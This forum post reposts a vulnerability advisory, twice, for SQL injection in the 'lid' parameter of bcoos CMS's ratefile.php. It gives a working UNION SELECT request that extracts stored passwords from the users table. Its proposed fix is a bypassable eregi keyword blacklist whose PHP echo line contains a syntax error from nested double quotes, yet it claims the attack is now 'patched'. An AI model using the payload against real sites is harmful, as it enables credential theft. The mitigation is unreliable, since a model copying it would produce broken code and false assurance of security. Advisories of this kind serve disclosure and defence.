bcoos /mysections/ratefile.php lid variable SQL injection
Page 1 of 1
bcoos /mysections/ratefile.php lid variable SQL injection
############################################
bcoos /mysections/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
vendor notify:NO exploits available: YES
############################################
bcoos is content-community management system written in PHP-MySQL.
bcoops contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the script not properly sanitizing user-supplied input to the 'lid' variable, and adresses/ratefile.php script.This may allow an attacker to inject or manipulate SQL queries in the backend database.
#################
Versions:
#################
bcoops =< 1.0.11 vulnerable
#################
Solution:
#################
No solution at this time !!!
Also you can try to edit the source code and put this code to mitigate 'union' injection:
open modules/mysections/ratefile.php
around line 76 found this code:
exit();
} else {
you can change for:
exit();
}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style="text-align: center;"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {
And now this union sql attack is patched
#################
Timeline:
#################
#################
SQL intection:
#################
http://localhost/modules/mysections/ratefile.php?lid=
-99%20UNION%20SELECT%20pass%20FROM%20bcoops_users%20LIMIT%201
#######################€nd##############################
bcoos /mysections/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
vendor notify:NO exploits available: YES
############################################
bcoos is content-community management system written in PHP-MySQL.
bcoops contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the script not properly sanitizing user-supplied input to the 'lid' variable, and adresses/ratefile.php script.This may allow an attacker to inject or manipulate SQL queries in the backend database.
#################
Versions:
#################
bcoops =< 1.0.11 vulnerable
#################
Solution:
#################
No solution at this time !!!
Also you can try to edit the source code and put this code to mitigate 'union' injection:
open modules/mysections/ratefile.php
around line 76 found this code:
exit();
} else {
you can change for:
exit();
}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style="text-align: center;"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {
And now this union sql attack is patched
#################
Timeline:
#################
#################
SQL intection:
#################
http://localhost/modules/mysections/ratefile.php?lid=
-99%20UNION%20SELECT%20pass%20FROM%20bcoops_users%20LIMIT%201
#######################€nd##############################
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics
» DHCart Multiple variable XSS and stored XSS
» Wowd search client multiple variable xss
» Yogurt Social Network fans.php uid variable XSS
» Kshop module search variable and field remote XSS
» BaconMap 1.0 SQL Injection
» Wowd search client multiple variable xss
» Yogurt Social Network fans.php uid variable XSS
» Kshop module search variable and field remote XSS
» BaconMap 1.0 SQL Injection
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum